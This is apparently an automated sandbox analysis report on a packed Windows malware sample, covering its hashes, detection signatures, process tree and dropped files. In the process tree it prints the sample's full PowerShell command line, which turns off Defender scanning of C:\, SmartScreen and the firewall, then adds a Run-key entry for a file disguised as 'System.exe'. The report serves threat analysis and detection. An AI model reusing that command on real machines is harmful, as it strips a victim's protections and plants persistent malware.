Analysis
- max time kernel: 300s
- max time network: 164s
- platform: windows7_x64
- resource: win7-20220718-en
- resource tags: arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
- submitted: 02-08-2022 22:17
Behavioral task behavioral1
- Sample: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
- Resource: win7-20220718-en
Behavioral task behavioral2
- Sample: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
- Resource: win10-20220718-en
General
- Target: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
- Size: 3.4MB
- MD5: 55a6d22be09d762103ae315f97b58561
- SHA1: f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
- SHA256: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
- SHA512: 4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
Malware Config
Signatures
- Modifies security service (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" (powershell.exe)
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoCs)
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
  Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  Processes: UpSys.exe (pid 2036), UpSys.exe (pid 108), UpSys.exe (pid 316)
- Modifies Windows Firewall (1 TTPs, 1 IoCs)
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
- Drops startup file (1 IoCs)
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
- Loads dropped DLL (2 IoCs)
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe (pid 892), powershell.exe (pid 1112)
- YARA rule matches (resource: yara_rule)
  behavioral1/memory/892-54-0x000000013FF90000-0x00000001408E8000-memory.dmp: themida
  behavioral1/memory/892-55-0x000000013FF90000-0x00000001408E8000-memory.dmp: themida
  behavioral1/memory/892-56-0x000000013FF90000-0x00000001408E8000-memory.dmp: themida
  behavioral1/memory/892-57-0x000000013FF90000-0x00000001408E8000-memory.dmp: themida
  \ProgramData\MicrosoftNetwork\System.exe: themida
  behavioral1/memory/892-86-0x000000013FF90000-0x00000001408E8000-memory.dmp: themida
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" (powershell.exe)
- Checks whether UAC is enabled
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe (pid 892)
- Drops file in Windows directory (1 IoCs)
  Processes: makecab.exe
  File created: C:\Windows\Logs\CBS\CbsPersist_20220803001822.cab (makecab.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies data under HKEY_USERS (5 IoCs)
  Processes: UpSys.exe, powershell.exe
  Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (UpSys.exe)
  Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (UpSys.exe)
  Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (UpSys.exe)
  Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
  Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801c988acea6d801 (powershell.exe)
- Modifies system certificate store
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted) (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (certificate blob omitted; this value is set three times) (41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (repeated entries collapsed; most of the 64 hits belong to pid 892): 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe (pid 892), powershell.exe (pid 1112), UpSys.exe (pid 2036), UpSys.exe (pid 108), powershell.exe (pid 684)
- Suspicious use of AdjustPrivilegeToken (9 IoCs)
  Processes: powershell.exe, UpSys.exe, UpSys.exe, powershell.exe
  Token: SeDebugPrivilege (pid 1112, powershell.exe)
  Token: SeDebugPrivilege (pid 2036, UpSys.exe)
  Token: SeAssignPrimaryTokenPrivilege (pid 2036, UpSys.exe)
  Token: SeIncreaseQuotaPrivilege (pid 2036, UpSys.exe)
  Token: 0 (pid 2036, UpSys.exe)
  Token: SeDebugPrivilege (pid 108, UpSys.exe)
  Token: SeAssignPrimaryTokenPrivilege (pid 108, UpSys.exe)
  Token: SeIncreaseQuotaPrivilege (pid 108, UpSys.exe)
  Token: SeDebugPrivilege (pid 684, powershell.exe)
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe, powershell.exe, UpSys.exe
  PID 892 wrote to memory of 1112: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -> powershell.exe (recorded 3 times)
  PID 1112 wrote to memory of 2036: powershell.exe -> UpSys.exe (recorded 3 times)
  PID 1112 wrote to memory of 2024: powershell.exe -> netsh.exe (recorded 3 times)
  PID 316 wrote to memory of 684: UpSys.exe -> powershell.exe (recorded 3 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
    - Modifies security service
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\ProgramData\UpSys.exe (depth 3)
      Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - C:\ProgramData\UpSys.exe (depth 4)
        Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - C:\ProgramData\UpSys.exe (depth 5)
          Command line: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
          - Executes dropped EXE
          - Modifies data under HKEY_USERS
          - Suspicious use of WriteProcessMemory
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\netsh.exe (depth 3)
      Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      - Modifies Windows Firewall
- C:\Windows\system32\makecab.exe (depth 1)
  Command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220803001822.log C:\Windows\Logs\CBS\CbsPersist_20220803001822.cab
  - Drops file in Windows directory
Network
Downloads
- C:\ProgramData\UpSys.exe
  Filesize: 923KB
  MD5: efe5769e37ba37cf4607cb9918639932
  SHA1: f24ca204af2237a714e8b41d54043da7bbe5393b
  SHA256: 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
  SHA512: 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
- \ProgramData\MicrosoftNetwork\System.exe
  Filesize: 3.4MB
  MD5: 55a6d22be09d762103ae315f97b58561
  SHA1: f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
  SHA256: 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
  SHA512: 4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
- \ProgramData\UpSys.exe
  Filesize: 923KB
  MD5: efe5769e37ba37cf4607cb9918639932
  SHA1: f24ca204af2237a714e8b41d54043da7bbe5393b
  SHA256: 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
  SHA512: 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
- memory/684-85-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp (Filesize: 11.4MB)
- memory/684-84-0x000007FEF3A00000-0x000007FEF4423000-memory.dmp (Filesize: 10.1MB)
- memory/684-89-0x000000000266B000-0x000000000268A000-memory.dmp (Filesize: 124KB)
- memory/684-88-0x0000000002664000-0x0000000002667000-memory.dmp (Filesize: 12KB)
- memory/684-82-0x0000000000000000-mapping.dmp
- memory/892-55-0x000000013FF90000-0x00000001408E8000-memory.dmp (Filesize: 9.3MB)
- memory/892-59-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp (Filesize: 8KB)
- memory/892-86-0x000000013FF90000-0x00000001408E8000-memory.dmp (Filesize: 9.3MB)
- memory/892-87-0x0000000077090000-0x0000000077239000-memory.dmp (Filesize: 1.7MB)
- memory/892-90-0x000000013F940000-0x000000013F950000-memory.dmp (Filesize: 64KB)
- memory/892-58-0x0000000077090000-0x0000000077239000-memory.dmp (Filesize: 1.7MB)
- memory/892-54-0x000000013FF90000-0x00000001408E8000-memory.dmp (Filesize: 9.3MB)
- memory/892-56-0x000000013FF90000-0x00000001408E8000-memory.dmp (Filesize: 9.3MB)
- memory/892-57-0x000000013FF90000-0x00000001408E8000-memory.dmp (Filesize: 9.3MB)
- memory/892-73-0x000000013F940000-0x000000013F950000-memory.dmp (Filesize: 64KB)
- memory/1112-65-0x000000001B770000-0x000000001BA6F000-memory.dmp (Filesize: 3.0MB)
- memory/1112-76-0x0000000002594000-0x0000000002597000-memory.dmp (Filesize: 12KB)
- memory/1112-77-0x000000000259B000-0x00000000025BA000-memory.dmp (Filesize: 124KB)
- memory/1112-60-0x0000000000000000-mapping.dmp
- memory/1112-74-0x0000000002594000-0x0000000002597000-memory.dmp (Filesize: 12KB)
- memory/1112-64-0x000007FEF3380000-0x000007FEF3EDD000-memory.dmp (Filesize: 11.4MB)
- memory/1112-62-0x000007FEF3EE0000-0x000007FEF4903000-memory.dmp (Filesize: 10.1MB)
- memory/1112-75-0x000000000259B000-0x00000000025BA000-memory.dmp (Filesize: 124KB)
- memory/2024-71-0x0000000000000000-mapping.dmp
- memory/2036-68-0x0000000000000000-mapping.dmp